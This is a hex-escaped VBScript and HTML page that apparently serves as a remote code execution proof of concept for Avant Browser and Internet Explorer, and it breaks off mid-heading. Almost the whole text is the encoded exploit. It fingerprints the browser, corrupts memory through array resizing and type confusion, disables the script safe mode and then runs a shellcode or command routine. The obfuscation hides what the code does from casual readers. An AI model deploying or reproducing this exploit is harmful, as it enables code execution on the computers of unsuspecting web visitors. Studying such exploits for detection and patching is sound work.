\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\
\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\
\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\
\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\
\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\
\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6D\\x65\\x6D\\x3D\\x63\\x69\\x6E\\x74\\x28\\x61\\x30\\x2B\\x31\\x29\\x2A\\x31\\x36\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\
\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x28\\x6A\\x3D\\x6D\\x65\\x6D\\x2B\\x34\\x29\\x20\\x6F\\x72\\x20\\x28\\x6A\\x2A\\x38\\x3D\\x6D\\x65\\x6D\\x2B\\x38\\x29\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x76\\x61\\x72\\x74\\x79\
\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x2D\\x31\\x29\\x29\\x3C\\x3E\\x30\\x29\\x20\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x49\\x73\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x3D\\x20\\x46\\x61\\x6C\\x73\\x65\\x20\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x56\\x61\\x72\\x54\\x79\\x70\\x65\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x32\\x66\\x36\\x36\\x29\\x20\\x54\\x68\\x65\\x6E\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x28\\x74\\x79\\x70\\x65\\x31\\x3D\\x26\\x68\\x42\\x39\\x41\\x44\\x29\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\
\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6D\\x28\\x61\\x64\\x64\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x61\\x64\\x64\\x2B\\x34\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6D\\x3D\\x6C\\x65\\x6E\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x3C\\x63\\x65\\x6E\\x74\\x65\\x72\\x3E\\x0D\\x0A\\x20\\x3C\\x73\\x74\\x72\\x6F\\x6E\\x67\\x3E\\x41\\x76\\x61\\x6E\\x74\\x20\\x42\\x72\\x6F\\x77\\x73\\x65\\x72\\x20\\x52\\x65\\x6D\\x6F\\x74\\x65\\x20\\x43\\x6F\\x64\\x65\\x20\\x45\\x78\\x65\\x63\\x75\\x7